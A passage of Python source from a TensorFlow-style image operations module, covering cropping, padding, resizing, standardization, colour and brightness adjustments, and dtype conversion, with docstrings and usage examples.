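  cropped = tf.image.crop_to_bounding_box(image, offset_height=8, offset_width=8,
                                          target_height=32, target_width=32)
  # `cropped` has shape [32, 32, 3].
  ```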
"""
with ops.name_scope(None, 'crop_to_bounding_box', [image]):
image = ops.convert_to_tensor(image, name='image')
is_batch = True
image_shape = image.get_shape()
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
batch, height, width, depth = _ImageDimensions(image, rank=4)
assert_ops += _assert(offset_width >= 0, ValueError,
'offset_width must be >= 0.')
assert_ops += _assert(offset_height >= 0, ValueError,
'offset_height must be >= 0.')
assert_ops += _assert(target_width > 0, ValueError,
'target_width must be > 0.')
assert_ops += _assert(target_height > 0, ValueError,
'target_height must be > 0.')
assert_ops += _assert(width >= (target_width + offset_width), ValueError,
'width must be >= target + offset.')
assert_ops += _assert(height >= (target_height + offset_height), ValueError,
'height must be >= target + offset.')
image = control_flow_ops.with_dependencies(assert_ops, image)
cropped = array_ops.slice(
image, array_ops.stack([0, offset_height, offset_width, 0]),
array_ops.stack([-1, target_height, target_width, -1]))
cropped_shape = [
None if _is_tensor(i) else i
for i in [batch, target_height, target_width, depth]
]
cropped.set_shape(cropped_shape)
if not is_batch:
cropped = array_ops.squeeze(cropped, axis=[0])
return cropped
@tf_export('image.resize_image_with_crop_or_pad')
def resize_image_with_crop_or_pad(image, target_height, target_width):
"""Crops and/or pads an image to a target width and height.
Resizes an image to a target width and height by either centrally
cropping the image or padding it evenly with zeros.
If `width` or `height` is greater than the specified `target_width` or
`target_height` respectively, this op centrally crops along that dimension.
If `width` or `height` is smaller than the specified `target_width` or
`target_height` respectively, this op centrally pads with 0 along that
dimension.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
target_height: Target height.
target_width: Target width.
Raises:
ValueError: if `target_height` or `target_width` are zero or negative.
Returns:
Cropped and/or padded image.
If `images` was 4-D, a 4-D float Tensor of shape
`[batch, new_height, new_width, channels]`.
If `images` was 3-D, a 3-D float Tensor of shape
`[new_height, new_width, channels]`.
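  For example, a sketch (illustrative values; assumes `import tensorflow as tf`):
  ```python
  image = tf.zeros([40, 80, 3])
  out = tf.image.resize_image_with_crop_or_pad(image, 60, 60)
  # Height 40 -> 60 by central zero-padding; width 80 -> 60 by central cropping.
  # `out` has shape [60, 60, 3].
  ```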
"""
with ops.name_scope(None, 'resize_image_with_crop_or_pad', [image]):
image = ops.convert_to_tensor(image, name='image')
image_shape = image.get_shape()
is_batch = True
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
assert_ops += _assert(target_width > 0, ValueError,
'target_width must be > 0.')
assert_ops += _assert(target_height > 0, ValueError,
'target_height must be > 0.')
image = control_flow_ops.with_dependencies(assert_ops, image)
# `crop_to_bounding_box` and `pad_to_bounding_box` have their own checks.
# Make sure our checks come first, so that error messages are clearer.
if _is_tensor(target_height):
target_height = control_flow_ops.with_dependencies(
assert_ops, target_height)
if _is_tensor(target_width):
target_width = control_flow_ops.with_dependencies(assert_ops,
target_width)
def max_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.maximum(x, y)
else:
return max(x, y)
def min_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.minimum(x, y)
else:
return min(x, y)
def equal_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.equal(x, y)
else:
return x == y
_, height, width, _ = _ImageDimensions(image, rank=4)
width_diff = target_width - width
offset_crop_width = max_(-width_diff // 2, 0)
offset_pad_width = max_(width_diff // 2, 0)
height_diff = target_height - height
offset_crop_height = max_(-height_diff // 2, 0)
offset_pad_height = max_(height_diff // 2, 0)
# Maybe crop if needed.
cropped = crop_to_bounding_box(image, offset_crop_height, offset_crop_width,
min_(target_height, height),
min_(target_width, width))
# Maybe pad if needed.
resized = pad_to_bounding_box(cropped, offset_pad_height, offset_pad_width,
target_height, target_width)
# In theory all the checks below are redundant.
if resized.get_shape().ndims is None:
raise ValueError('resized contains no shape.')
_, resized_height, resized_width, _ = _ImageDimensions(resized, rank=4)
assert_ops = []
assert_ops += _assert(
equal_(resized_height, target_height), ValueError,
'resized height is not correct.')
assert_ops += _assert(
equal_(resized_width, target_width), ValueError,
'resized width is not correct.')
resized = control_flow_ops.with_dependencies(assert_ops, resized)
if not is_batch:
resized = array_ops.squeeze(resized, axis=[0])
return resized
@tf_export('image.ResizeMethod')
class ResizeMethod(object):
BILINEAR = 0
NEAREST_NEIGHBOR = 1
BICUBIC = 2
AREA = 3
@tf_export(v1=['image.resize_images', 'image.resize'])
def resize_images(images,
size,
method=ResizeMethod.BILINEAR,
align_corners=False,
preserve_aspect_ratio=False):
return resize_images_v2(
images=images,
size=size,
method=method,
align_corners=align_corners,
preserve_aspect_ratio=preserve_aspect_ratio,
name=None)
@tf_export('image.resize', v1=[])
def resize_images_v2(images,
size,
method=ResizeMethod.BILINEAR,
align_corners=False,
preserve_aspect_ratio=False,
name=None):
"""Resize `images` to `size` using the specified `method`.
Resized images will be distorted if their original aspect ratio is not
the same as `size`. To avoid distortions see
`tf.image.resize_image_with_pad`.
`method` can be one of:
* <b>`ResizeMethod.BILINEAR`</b>: [Bilinear interpolation.](
https://en.wikipedia.org/wiki/Bilinear_interpolation)
* <b>`ResizeMethod.NEAREST_NEIGHBOR`</b>: [Nearest neighbor interpolation.](
https://en.wikipedia.org/wiki/Nearest-neighbor_interpolation)
* <b>`ResizeMethod.BICUBIC`</b>: [Bicubic interpolation.](
https://en.wikipedia.org/wiki/Bicubic_interpolation)
* <b>`ResizeMethod.AREA`</b>: Area interpolation.
The return value has the same type as `images` if `method` is
`ResizeMethod.NEAREST_NEIGHBOR`. It will also have the same type as `images`
if the size of `images` can be statically determined to be the same as `size`,
because `images` is returned in this case. Otherwise, the return value has
type `float32`.
Args:
images: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
size: A 1-D int32 Tensor of 2 elements: `new_height, new_width`. The
new size for the images.
method: ResizeMethod. Defaults to `ResizeMethod.BILINEAR`.
align_corners: bool. If True, the centers of the 4 corner pixels of the
input and output tensors are aligned, preserving the values at the
corner pixels. Defaults to `False`.
preserve_aspect_ratio: Whether to preserve the aspect ratio. If this is set,
then `images` will be resized to a size that fits in `size` while
preserving the aspect ratio of the original image. Scales up the image if
`size` is bigger than the current size of the `image`. Defaults to False.
name: A name for this operation (optional).
Raises:
ValueError: if the shape of `images` is incompatible with the
shape arguments to this function
ValueError: if `size` has invalid shape or type.
ValueError: if an unsupported resize method is specified.
Returns:
If `images` was 4-D, a 4-D float Tensor of shape
`[batch, new_height, new_width, channels]`.
If `images` was 3-D, a 3-D float Tensor of shape
`[new_height, new_width, channels]`.
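  For example, a sketch (illustrative values; in TF 1.x this function is exposed
  as `tf.image.resize_images`, in 2.x as `tf.image.resize`):
  ```python
  image = tf.zeros([64, 64, 3])
  small = tf.image.resize_images(image, [32, 32],
                                 method=tf.image.ResizeMethod.BILINEAR)
  # `small` has shape [32, 32, 3] and dtype float32.
  ```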
"""
with ops.name_scope(name, 'resize', [images, size]):
images = ops.convert_to_tensor(images, name='images')
if images.get_shape().ndims is None:
raise ValueError('\'images\' contains no shape.')
# TODO(shlens): Migrate this functionality to the underlying Op's.
is_batch = True
if images.get_shape().ndims == 3:
is_batch = False
images = array_ops.expand_dims(images, 0)
elif images.get_shape().ndims != 4:
raise ValueError('\'images\' must have either 3 or 4 dimensions.')
_, height, width, _ = images.get_shape().as_list()
try:
size = ops.convert_to_tensor(size, dtypes.int32, name='size')
except (TypeError, ValueError):
raise ValueError('\'size\' must be a 1-D int32 Tensor')
if not size.get_shape().is_compatible_with([2]):
raise ValueError('\'size\' must be a 1-D Tensor of 2 elements: '
'new_height, new_width')
size_const_as_shape = tensor_util.constant_value_as_shape(size)
new_height_const = size_const_as_shape.dims[0].value
new_width_const = size_const_as_shape.dims[1].value
if preserve_aspect_ratio:
# Get the current shapes of the image, even if dynamic.
_, current_height, current_width, _ = _ImageDimensions(images, rank=4)
# do the computation to find the right scale and height/width.
scale_factor_height = (math_ops.to_float(new_height_const) /
math_ops.to_float(current_height))
scale_factor_width = (math_ops.to_float(new_width_const) /
math_ops.to_float(current_width))
scale_factor = math_ops.minimum(scale_factor_height, scale_factor_width)
scaled_height_const = math_ops.to_int32(
math_ops.round(scale_factor * math_ops.to_float(current_height)))
scaled_width_const = math_ops.to_int32(
math_ops.round(scale_factor * math_ops.to_float(current_width)))
# NOTE: Reset the size and other constants used later.
size = ops.convert_to_tensor([scaled_height_const, scaled_width_const],
dtypes.int32, name='size')
size_const_as_shape = tensor_util.constant_value_as_shape(size)
new_height_const = size_const_as_shape.dims[0].value
new_width_const = size_const_as_shape.dims[1].value
# If we can determine that the height and width will be unmodified by this
# transformation, we avoid performing the resize.
if all(x is not None
for x in [new_width_const, width, new_height_const, height]) and (
width == new_width_const and height == new_height_const):
if not is_batch:
images = array_ops.squeeze(images, axis=[0])
return images
if method == ResizeMethod.BILINEAR:
images = gen_image_ops.resize_bilinear(
images, size, align_corners=align_corners)
elif method == ResizeMethod.NEAREST_NEIGHBOR:
images = gen_image_ops.resize_nearest_neighbor(
images, size, align_corners=align_corners)
elif method == ResizeMethod.BICUBIC:
images = gen_image_ops.resize_bicubic(
images, size, align_corners=align_corners)
elif method == ResizeMethod.AREA:
images = gen_image_ops.resize_area(
images, size, align_corners=align_corners)
else:
raise ValueError('Resize method is not implemented.')
# NOTE(mrry): The shape functions for the resize ops cannot unpack
# the packed values in `new_size`, so set the shape here.
images.set_shape([None, new_height_const, new_width_const, None])
if not is_batch:
images = array_ops.squeeze(images, axis=[0])
return images
@tf_export('image.resize_image_with_pad')
def resize_image_with_pad(image,
target_height,
target_width,
method=ResizeMethod.BILINEAR):
"""Resizes and pads an image to a target width and height.
Resizes an image to a target width and height by keeping
the aspect ratio the same without distortion. If the target
dimensions don't match the image dimensions, the image
is resized and then padded with zeroes to match requested
dimensions.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
target_height: Target height.
target_width: Target width.
method: Method to use for resizing image. See `resize_images()`
Raises:
ValueError: if `target_height` or `target_width` are zero or negative.
Returns:
Resized and padded image.
If `images` was 4-D, a 4-D float Tensor of shape
`[batch, new_height, new_width, channels]`.
If `images` was 3-D, a 3-D float Tensor of shape
`[new_height, new_width, channels]`.
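  For example, a sketch (illustrative values; assumes `import tensorflow as tf`):
  ```python
  image = tf.zeros([40, 80, 3])
  out = tf.image.resize_image_with_pad(image, 60, 60)
  # The image is first resized to [30, 60] (keeping the 1:2 aspect ratio) and
  # then padded with zeros to shape [60, 60, 3].
  ```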
"""
with ops.name_scope(None, 'resize_image_with_pad', [image]):
image = ops.convert_to_tensor(image, name='image')
image_shape = image.get_shape()
is_batch = True
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
assert_ops += _assert(target_width > 0, ValueError,
'target_width must be > 0.')
assert_ops += _assert(target_height > 0, ValueError,
'target_height must be > 0.')
image = control_flow_ops.with_dependencies(assert_ops, image)
def max_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.maximum(x, y)
else:
return max(x, y)
_, height, width, _ = _ImageDimensions(image, rank=4)
# convert values to float, to ease divisions
f_height = math_ops.cast(height, dtype=dtypes.float64)
f_width = math_ops.cast(width, dtype=dtypes.float64)
f_target_height = math_ops.cast(target_height, dtype=dtypes.float64)
f_target_width = math_ops.cast(target_width, dtype=dtypes.float64)
# Find the ratio by which the image must be adjusted
# to fit within the target
ratio = max_(f_width / f_target_width, f_height / f_target_height)
resized_height_float = f_height / ratio
resized_width_float = f_width / ratio
resized_height = math_ops.cast(
math_ops.floor(resized_height_float), dtype=dtypes.int32)
resized_width = math_ops.cast(
math_ops.floor(resized_width_float), dtype=dtypes.int32)
padding_height = (f_target_height - resized_height_float) / 2
padding_width = (f_target_width - resized_width_float) / 2
f_padding_height = math_ops.floor(padding_height)
f_padding_width = math_ops.floor(padding_width)
p_height = max_(0, math_ops.cast(f_padding_height, dtype=dtypes.int32))
p_width = max_(0, math_ops.cast(f_padding_width, dtype=dtypes.int32))
# Resize first, then pad to meet requested dimensions
resized = resize_images(image, [resized_height, resized_width], method)
padded = pad_to_bounding_box(resized, p_height, p_width, target_height,
target_width)
if padded.get_shape().ndims is None:
raise ValueError('padded contains no shape.')
_ImageDimensions(padded, rank=4)
if not is_batch:
padded = array_ops.squeeze(padded, axis=[0])
return padded
@tf_export('image.per_image_standardization')
def per_image_standardization(image):
"""Linearly scales `image` to have zero mean and unit variance.
This op computes `(x - mean) / adjusted_stddev`, where `mean` is the average
of all values in image, and
`adjusted_stddev = max(stddev, 1.0/sqrt(image.NumElements()))`.
`stddev` is the standard deviation of all values in `image`. It is capped
away from zero to protect against division by 0 when handling uniform images.
Args:
image: An n-D Tensor where the last 3 dimensions are
`[height, width, channels]`.
Returns:
The standardized image with same shape as `image`.
Raises:
ValueError: if the shape of 'image' is incompatible with this function.
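  For example, a sketch (illustrative only; assumes `import tensorflow as tf`,
  the input is converted to float32 internally):
  ```python
  image = tf.random_uniform([64, 64, 3])
  standardized = tf.image.per_image_standardization(image)
  # `standardized` has approximately zero mean and unit variance.
  ```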
"""
with ops.name_scope(None, 'per_image_standardization', [image]) as scope:
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
num_pixels = math_ops.reduce_prod(array_ops.shape(image)[-3:])
image = math_ops.cast(image, dtype=dtypes.float32)
image_mean = math_ops.reduce_mean(image, axis=[-1, -2, -3], keepdims=True)
variance = (
math_ops.reduce_mean(
math_ops.square(image), axis=[-1, -2, -3], keepdims=True) -
math_ops.square(image_mean))
variance = gen_nn_ops.relu(variance)
stddev = math_ops.sqrt(variance)
# Apply a minimum normalization that protects us against uniform images.
min_stddev = math_ops.rsqrt(math_ops.cast(num_pixels, dtypes.float32))
pixel_value_scale = math_ops.maximum(stddev, min_stddev)
pixel_value_offset = image_mean
image = math_ops.subtract(image, pixel_value_offset)
image = math_ops.div(image, pixel_value_scale, name=scope)
return image
@tf_export('image.random_brightness')
def random_brightness(image, max_delta, seed=None):
"""Adjust the brightness of images by a random factor.
Equivalent to `adjust_brightness()` using a `delta` randomly picked in the
interval `[-max_delta, max_delta)`.
Args:
image: An image or images to adjust.
max_delta: float, must be non-negative.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
Returns:
The brightness-adjusted image(s).
Raises:
ValueError: if `max_delta` is negative.
"""
if max_delta < 0:
raise ValueError('max_delta must be non-negative.')
delta = random_ops.random_uniform([], -max_delta, max_delta, seed=seed)
return adjust_brightness(image, delta)
@tf_export('image.random_contrast')
def random_contrast(image, lower, upper, seed=None):
"""Adjust the contrast of an image or images by a random factor.
Equivalent to `adjust_contrast()` but uses a `contrast_factor` randomly
picked in the interval `[lower, upper]`.
Args:
image: An image tensor with 3 or more dimensions.
lower: float. Lower bound for the random contrast factor.
upper: float. Upper bound for the random contrast factor.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed` for behavior.
Returns:
The contrast-adjusted image(s).
Raises:
ValueError: if `upper <= lower` or if `lower < 0`.
"""
if upper <= lower:
raise ValueError('upper must be > lower.')
if lower < 0:
raise ValueError('lower must be non-negative.')
  # Generate a float in [lower, upper]
contrast_factor = random_ops.random_uniform([], lower, upper, seed=seed)
return adjust_contrast(image, contrast_factor)
@tf_export('image.adjust_brightness')
def adjust_brightness(image, delta):
"""Adjust the brightness of RGB or Grayscale images.
This is a convenience method that converts RGB images to float
representation, adjusts their brightness, and then converts them back to the
original data type. If several adjustments are chained, it is advisable to
minimize the number of redundant conversions.
The value `delta` is added to all components of the tensor `image`. `image` is
converted to `float` and scaled appropriately if it is in fixed-point
representation, and `delta` is converted to the same data type. For regular
images, `delta` should be in the range `[0,1)`, as it is added to the image in
floating point representation, where pixel values are in the `[0,1)` range.
Args:
image: RGB image or images to adjust.
delta: A scalar. Amount to add to the pixel values.
Returns:
A brightness-adjusted tensor of the same shape and type as `image`.
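  For example, a sketch (illustrative; assumes `import tensorflow as tf` and a
  float image with values in `[0, 1)`):
  ```python
  image = tf.zeros([8, 8, 3], dtype=tf.float32)
  brighter = tf.image.adjust_brightness(image, delta=0.1)
  # Every channel of every pixel is increased by 0.1.
  ```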
"""
with ops.name_scope(None, 'adjust_brightness', [image, delta]) as name:
image = ops.convert_to_tensor(image, name='image')
    # Remember the original dtype so we can convert back if needed
orig_dtype = image.dtype
if orig_dtype in [dtypes.float16, dtypes.float32]:
flt_image = image
else:
flt_image = convert_image_dtype(image, dtypes.float32)
adjusted = math_ops.add(
flt_image, math_ops.cast(delta, flt_image.dtype), name=name)
return convert_image_dtype(adjusted, orig_dtype, saturate=True)
@tf_export('image.adjust_contrast')
def adjust_contrast(images, contrast_factor):
"""Adjust contrast of RGB or grayscale images.
This is a convenience method that converts RGB images to float
representation, adjusts their contrast, and then converts them back to the
original data type. If several adjustments are chained, it is advisable to
minimize the number of redundant conversions.
`images` is a tensor of at least 3 dimensions. The last 3 dimensions are
interpreted as `[height, width, channels]`. The other dimensions only
represent a collection of images, such as `[batch, height, width, channels].`
Contrast is adjusted independently for each channel of each image.
For each channel, this Op computes the mean of the image pixels in the
channel and then adjusts each component `x` of each pixel to
`(x - mean) * contrast_factor + mean`.
Args:
images: Images to adjust. At least 3-D.
contrast_factor: A float multiplier for adjusting contrast.
Returns:
The contrast-adjusted image or images.
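  For example, a sketch (illustrative values; assumes `import tensorflow as tf`):
  ```python
  images = tf.random_uniform([2, 8, 8, 3])  # a small batch of float images
  high_contrast = tf.image.adjust_contrast(images, contrast_factor=2.0)
  # Each channel is stretched around its per-image mean:
  #   x -> (x - mean) * 2.0 + mean
  ```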
"""
with ops.name_scope(None, 'adjust_contrast',
[images, contrast_factor]) as name:
images = ops.convert_to_tensor(images, name='images')
    # Remember the original dtype so we can convert back if needed
orig_dtype = images.dtype
if orig_dtype in (dtypes.float16, dtypes.float32):
flt_images = images
else:
flt_images = convert_image_dtype(images, dtypes.float32)
adjusted = gen_image_ops.adjust_contrastv2(
flt_images, contrast_factor=contrast_factor, name=name)
return convert_image_dtype(adjusted, orig_dtype, saturate=True)
@tf_export('image.adjust_gamma')
def adjust_gamma(image, gamma=1, gain=1):
"""Performs Gamma Correction on the input image.
Also known as Power Law Transform. This function transforms the
input image pixelwise according to the equation `Out = In**gamma`
after scaling each pixel to the range 0 to 1.
Args:
image : A Tensor.
    gamma : A scalar or tensor. Non-negative real number.
gain : A scalar or tensor. The constant multiplier.
Returns:
A Tensor. Gamma corrected output image.
Raises:
ValueError: If gamma is negative.
Notes:
    For gamma greater than 1, the histogram will shift towards the left and
    the output image will be darker than the input image.
    For gamma less than 1, the histogram will shift towards the right and
    the output image will be brighter than the input image.
References:
[1] http://en.wikipedia.org/wiki/Gamma_correction
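  For example, a sketch (illustrative; assumes `import tensorflow as tf`; a
  gamma above 1 darkens a float image):
  ```python
  image = tf.random_uniform([8, 8, 3], dtype=tf.float32)
  darker = tf.image.adjust_gamma(image, gamma=2.0, gain=1.0)
  # Computes (image / scale) ** 2.0 * scale * 1.0, where `scale` spans the
  # dtype's intensity range (1.0 for float inputs); the result is float32.
  ```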
"""
with ops.name_scope(None, 'adjust_gamma', [image, gamma, gain]) as name:
# Convert pixel value to DT_FLOAT for computing adjusted image.
img = ops.convert_to_tensor(image, name='img', dtype=dtypes.float32)
# Keep image dtype for computing the scale of corresponding dtype.
image = ops.convert_to_tensor(image, name='image')
assert_op = _assert(gamma >= 0, ValueError,
'Gamma should be a non-negative real number.')
if assert_op:
gamma = control_flow_ops.with_dependencies(assert_op, gamma)
# scale = max(dtype) - min(dtype).
scale = constant_op.constant(
image.dtype.limits[1] - image.dtype.limits[0], dtype=dtypes.float32)
# According to the definition of gamma correction.
adjusted_img = (img / scale)**gamma * scale * gain
return adjusted_img
@tf_export('image.convert_image_dtype')
def convert_image_dtype(image, dtype, saturate=False, name=None):
"""Convert `image` to `dtype`, scaling its values if needed.
Images that are represented using floating point values are expected to have
values in the range [0,1). Image data stored in integer data types are
expected to have values in the range `[0,MAX]`, where `MAX` is the largest
positive representable number for the data type.
This op converts between data types, scaling the values appropriately before
casting.
Note that converting from floating point inputs to integer types may lead to
  over/underflow problems. Set saturate to `True` to avoid such problems in
problematic conversions. If enabled, saturation will clip the output into the
allowed range before performing a potentially dangerous cast (and only before
performing such a cast, i.e., when casting from a floating point to an integer
type, and when casting from a signed to an unsigned type; `saturate` has no
effect on casts between floats, or on casts that increase the type's range).
Args:
image: An image.
dtype: A `DType` to convert `image` to.
saturate: If `True`, clip the input before casting (if necessary).
name: A name for this operation (optional).
Returns:
`image`, converted to `dtype`.
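  For example, a sketch converting a uint8 image to float32 and back
  (illustrative; assumes `import tensorflow as tf`):
  ```python
  image_u8 = tf.zeros([8, 8, 3], dtype=tf.uint8)  # values in [0, 255]
  image_f = tf.image.convert_image_dtype(image_u8, tf.float32)
  # `image_f` has values scaled into [0, 1).
  back = tf.image.convert_image_dtype(image_f, tf.uint8, saturate=True)
  ```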
"""
image = ops.convert_to_tensor(image, name='image')
if dtype == image.dtype:
return array_ops.identity(image, name=name)
with ops.name_scope(name, 'convert_image', [image]) as name:
# Both integer: use integer multiplication in the larger range
if image.dtype.is_integer and dtype.is_integer:
scale_in = image.dtype.max
scale_out = dtype.max
if scale_in > scale_out:
# Scaling down, scale first, then cast. The scaling factor will
# cause in.max to be mapped to above out.max but below out.max+1,
# so that the output is safely in the supported range.
scale = (scale_in + 1) // (scale_out + 1)
scaled = math_ops.div(image, scale)
if saturate:
return math_ops.saturate_cast(scaled, dtype, name=name)
else:
return math_ops.cast(scaled, dtype, name=name)
else:
# Scaling up, cast first, then scale. The scale will not map in.max to
# out.max, but converting back and forth should result in no change.
if saturate:
cast = math_ops.saturate_cast(image, dtype)
else:
cast = math_ops.cast(image, dtype)
scale = (scale_out + 1) // (scale_in + 1)
return math_ops.multiply(cast, scale, name=name)
elif image.dtype.is_floating and dtype.is_floating:
# Both float: Just cast, no possible overflows in the allowed ranges.
      # Note: We're ignoring float overflows. If your image dynamic range
# exceeds float range you're on your own.
return math_ops.cast(image, dtype, name=name)
else:
if image.dtype.is_integer:
# Converting to float: first cast, then scale. No saturation possible.
cast = math_ops.cast(image, dtype)
scale = 1. / image.dtype.max
return math_ops.multiply(cast, scale, name=name)
else:
# Converting from float: first scale, then cast
scale = dtype.max + 0.5 # avoid rounding problems in the cast
scaled = math_ops.multiply(image, scale)
if saturate:
return math_ops.saturate_cast(scaled, dtype, name=name)
else:
return math_ops.cast(scaled, dtype, name=name)
@tf_export('image.rgb_to_grayscale')
def rgb_to_grayscale(images, name=None):
"""Converts one or more images from RGB to Grayscale.
Outputs a tensor of the same `DType` and rank as `images`. The size of the
last dimension of the output is 1, containing the Grayscale value of the
pixels.
Args:
images: The RGB tensor to convert. Last dimension must have size 3 and
should contain RGB values.
name: A name for the operation (optional).
Returns:
The converted grayscale image(s).
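  For example, a sketch (illustrative; assumes `import tensorflow as tf`):
  ```python
  rgb = tf.zeros([16, 16, 3], dtype=tf.float32)
  gray = tf.image.rgb_to_grayscale(rgb)
  # `gray` has shape [16, 16, 1].
  ```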
"""
with ops.name_scope(name, 'rgb_to_grayscale', [images]) as name:
images = ops.convert_to_tensor(images, name='images')
    # Remember the original dtype so we can convert back if needed
orig_dtype = images.dtype
flt_image = convert_image_dtype(images, dtypes.float32)
# Reference for converting between RGB and grayscale.
# https://en.wikipedia.org/wiki/Luma_%28video%29
rgb_weights = [0.2989, 0.5870, 0.1140]
gray_float = math_ops.tensordot(flt_image, rgb_weights, [-1, -1])
gray_float = array_ops.expand_dims(gray_float, -1)
return convert_image_dtype(gray_float, orig_dtype, name=name)
@tf_export('image.grayscale_to_rgb')
def grayscale_to_rgb(images, name=None):
"""Converts one or more images from Grayscale to RGB.
Outputs a tensor of the same `DType` and rank as `images`. The size of the
last dimension of the output is 3, containing the RGB value of the pixels.
Args:
images: The Grayscale tensor to convert. Last dimension must be size 1.
name: A name for the operation (optional).
Returns:
    The converted RGB image(s).
"""
with ops.name_scope(name, 'grayscale_to_rgb', [images]) as name:
images = ops.convert_to_tensor(images, name='images')
rank_1 = array_ops.expand_dims(array_ops.rank(images) - 1, 0)
shape_list = ([array_ops.ones(rank_1, dtype=dtypes.int32)] +
[array_ops.expand_dims(3, 0)])
multiples = array_ops.concat(shape_list, 0)
rgb = array_ops.tile(images, multiples, name=name)
rgb.set_shape(images.get_shape()[:-1].concatenate([3]))
return rgb
# pylint: disable=invalid-name
@tf_export('image.random_hue')
def random_hue(image, max_delta, seed=None):
"""Adjust the hue of RGB images by a random factor.
Equivalent to `adjust_hue()` but uses a `delta` randomly
picked in the interval `[-max_delta, max_delta]`.
`max_delta` must be in the interval `[0, 0.5]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
max_delta: float. Maximum value for the random delta.
seed: An operation-specific seed. It will be used in conjunction with the
graph-level seed to determine the real seeds that will be used in this
operation. Please see the documentation of set_random_seed for its
interaction with the graph-level random seed.
Returns:
Adjusted image(s), same shape and DType as `image`.
Raises:
ValueError: if `max_delta` is invalid.
"""
if max_delta > 0.5:
raise ValueError('max_delta must be <= 0.5.')
if max_delta < 0:
raise ValueError('max_delta must be non-negative.')
delta = random_ops.random_uniform([], -max_delta, max_delta, seed=seed)
return adjust_hue(image, delta)
@tf_export('image.adjust_hue')
def adjust_hue(image, delta, name=None):
"""Adjust hue of RGB images.
This is a convenience method that converts an RGB image to float
  representation, converts it to HSV, adds an offset to the hue channel, converts
back to RGB and then back to the original data type. If several adjustments
are chained it is advisable to minimize the number of redundant conversions.
`image` is an RGB image. The image hue is adjusted by converting the
image(s) to HSV and rotating the hue channel (H) by
`delta`. The image is then converted back to RGB.
`delta` must be in the interval `[-1, 1]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
delta: float. How much to add to the hue channel.
name: A name for this operation (optional).
Returns:
Adjusted image(s), same shape and DType as `image`.
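  For example, a sketch (illustrative; assumes `import tensorflow as tf`;
  `delta` rotates the hue channel):
  ```python
  image = tf.random_uniform([8, 8, 3], dtype=tf.float32)
  shifted = tf.image.adjust_hue(image, delta=0.2)
  ```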
"""
with ops.name_scope(name, 'adjust_hue', [image]) as name:
image = ops.convert_to_tensor(image, name='image')
    # Remember the original dtype so we can convert back if needed
orig_dtype = image.dtype
if orig_dtype in (dtypes.float16, dtypes.float32):
flt_image = image
else:
flt_image = convert_image_dtype(image, dtypes.float32)
rgb_altered = gen_image_ops.adjust_hue(flt_image, delta)
return convert_image_dtype(rgb_altered, orig_dtype)
# pylint: disable=invalid-name
@tf_export('image.random_jpeg_quality')
def random_jpeg_quality(image, min_jpeg_quality, max_jpeg_quality, seed=None):
"""Randomly changes jpeg encoding quality for inducing jpeg noise.
`min_jpeg_quality` must be in the interval `[0, 100]` and less than
`max_jpeg_quality`.
`max_jpeg_quality` must be in the interval `[0, 100]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
min_jpeg_quality: Minimum jpeg encoding quality to use.
max_jpeg_quality: Maximum jpeg encoding quality to use.
seed: An operation-specific seed. It will be used in conjunction
with the graph-level seed to determine the real seeds that will be
used in this operation. Please see the documentation of
set_random_seed for its interaction with the graph-level random seed.
Returns:
Adjusted image(s), same shape and DType as `image`.
Raises:
ValueError: if `min_jpeg_quality` or `max_jpeg_quality` is invalid.
"""
if (min_jpeg_quality < 0 or max_jpeg_quality < 0 or
min_jpeg_quality > 100 or max_jpeg_quality > 100):
raise ValueError('jpeg encoding range must be between 0 and 100.')
if min_jpeg_quality >= max_jpeg_quality:
raise ValueError('`min_jpeg_quality` must be less than `max_jpeg_quality`.')
np.random.seed(seed)
jpeg_quality = np.random.randint(min_jpeg_quality, max_jpeg_quality)
return adjust_jpeg_quality(image, jpeg_quality)
@tf_export('image.adjust_jpeg_quality')
def adjust_jpeg_quality(image, jpeg_quality, name=None):
"""Adjust jpeg encoding quality of an RGB image.
This is a convenience method that adjusts jpeg encoding quality of an
RGB image.
`image` is an RGB image. The image's encoding quality is adjusted
to `jpeg_quality`.
`jpeg_quality` must be in the interval `[0, 100]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
jpeg_quality: int. jpeg encoding quality.
name: A name for this operation (optional).
Returns:
Adjusted image(s), same shape and DType as `image`.
"""
with ops.name_scope(name, 'adjust_jpeg_quality', [image]) as name:
image = ops.convert_to_tensor(image, name='image')
    # Remember the original dtype so we can convert back if needed
orig_dtype = image.dtype
# Convert to uint8
image = convert_image_dtype(image, dtypes.uint8)
# Encode image to jpeg with given jpeg quality
image = gen_image_ops.encode_jpeg(image, quality=jpeg_quality)
# Decode jpeg image
image = gen_image_ops.decode_jpeg(image)
# Convert back to original dtype and return
return convert_image_dtype(image, orig_dtype)
@tf_export('image.random_saturation')
def random_saturation(image, lower, upper, seed=None):
"""Adjust the saturation of RGB images by a random factor.
